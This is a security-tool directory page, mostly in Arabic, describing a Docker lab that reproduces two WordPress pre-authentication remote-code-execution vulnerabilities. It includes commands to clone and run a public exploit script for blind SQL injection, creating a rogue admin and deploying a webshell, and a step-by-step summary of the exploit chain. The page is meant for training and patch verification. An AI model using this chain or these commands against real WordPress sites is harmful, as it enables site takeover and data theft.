Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-60137-and-CVE-2026-63030 — مختبر WordPress قائم على Docker يعيد إنتاج CVE-2026-60137 وCVE-2026-63030 لتنفيذ التعليمات البرمجية عن بُعد (RCE) قبل المصادقة، مع استغلال PoC بلغة Python لـ SQLi، وتصعيد الامتيازات، ونشر webshell. | Kitploit
أدوات/GitHubGitHub/ivanesk315/cve-2026-60137-and-cve-2026-63030
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالتعلم والتعليمتطوير الحمولاتمختبرات وتدريب عملي

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHubivanesk315/cve-2026-60137-and-cve-2026-63030

CVE-2026-60137-and-CVE-2026-63030

مختبر WordPress قائم على Docker يعيد إنتاج CVE-2026-60137 وCVE-2026-63030 لتنفيذ التعليمات البرمجية عن بُعد (RCE) قبل المصادقة، مع استغلال PoC بلغة Python لـ SQLi، وتصعيد الامتيازات، ونشر webshell.

عرض المستودع
منذ 18س 32دلم تتم المراجعة بعد

wp2shell Lab — CVE-2026-60137 & CVE-2026-63030

مختبر RCE قبل المصادقة في WordPress Core — استغلال حقيقي، RCE على الخادم.

تحذير: المختبر يشغّل WordPress عرضة للثغرات. لا تعرّضه للإنترنت.

البنية

root@kitploit:~
.
├── docker-compose.yml     # Lab: WordPress 6.9.4 + MariaDB 11 + phpMyAdmin
├── exploit/               # PoC exploit (clone từ GitHub)
│   └── wp2shell.py        # Full RCE exploit
├── REPORT.md              # Báo cáo phân tích root cause
└── README.md

الإعداد

1. تشغيل المختبر

root@kitploit:~
docker compose up -d

انتظر حتى ترى LAB READY في السجلات:

root@kitploit:~
docker compose logs -f wpcli

2. استنساخ PoC exploit

root@kitploit:~
git clone https://github.com/0xsha/wp2shell.git exploit

هذا الـ exploit:

  • Python 3.7+، لا يحتاج pip install لأي شيء (يستخدم stdlib فقط)
  • ينشئ حساب admin جديد دون الحاجة إلى كسر كلمة المرور
  • ينشر webshell تلقائيًا
  • shell تفاعلي

3. الاستغلال

root@kitploit:~
cd exploit

# Check vulnerability (non-destructive)
python wp2shell.py check http://localhost:8080

# Extract data qua blind SQLi
python wp2shell.py read http://localhost:8080 --preset users

# RCE — tạo admin + deploy webshell + chạy command
python wp2shell.py shell http://localhost:8080 --cmd id

# Interactive shell
python wp2shell.py shell http://localhost:8080 -i

الخدمات

ملخص مسار الاستغلال

root@kitploit:~
1. POST /wp-json/batch/v1
   └─ Sub-request[0]: malformed path → parse error
   └─ Sub-request[1]: /wp/v2/posts + author_exclude=<SQLi>
   └─ Sub-request[2]: sacrificial route
   → $matches[] bị lệch index → req[1] nhận handler của req[2]
   → bypass permission_callback → SQLi vào WP_Query

2. SQL Injection (author__not_in)
   → Scalar string bypass is_array() check
   → Raw SQL inject vào WHERE clause

3. Object Hydration → oEmbed Write → Parent Loop Repair
   → Poisoned WP_Post objects persist vào database

4. Changeset Privilege Escalation
   → WordPress switch current_user sang admin

5. Nested REST Request
   → Tạo admin account mới (không cần crack password)

6. Login + Upload webshell plugin → RCE

التحقق من التصحيح

root@kitploit:~
# Update WordPress trong container
docker exec -it wp2shell-lab-wp-1 bash -c \
  "curl -sO https://raw.githubusercontent.com/wp-cli/builds/gh-pages/phar/wp-cli.phar && \
   chmod +x wp-cli.phar && \
   ./wp-cli.phar core update --version=6.9.5 --allow-root"

# Re-run exploit — phải fail
python exploit/wp2shell.py check http://localhost:8080

التنظيف

root@kitploit:~
docker compose down -v

المراجع

  • 0xsha/wp2shell — GitHub
  • Picus: wp2shell RCE Explained
  • zsec.uk: Code Trace Deep Dive
  • VulnCheck Blog
  • Tenable FAQ
تنزيل الأداة
ServiceURLCredentials
WordPresshttp://localhost:8080admin / Admin!2345
WP Adminhttp://localhost:8080/wp-adminadmin / Admin!2345
phpMyAdminhttp://localhost:8081root / root
REST APIhttp://localhost:8080/wp-json/—
Batch endpointhttp://localhost:8080/wp-json/batch/v1—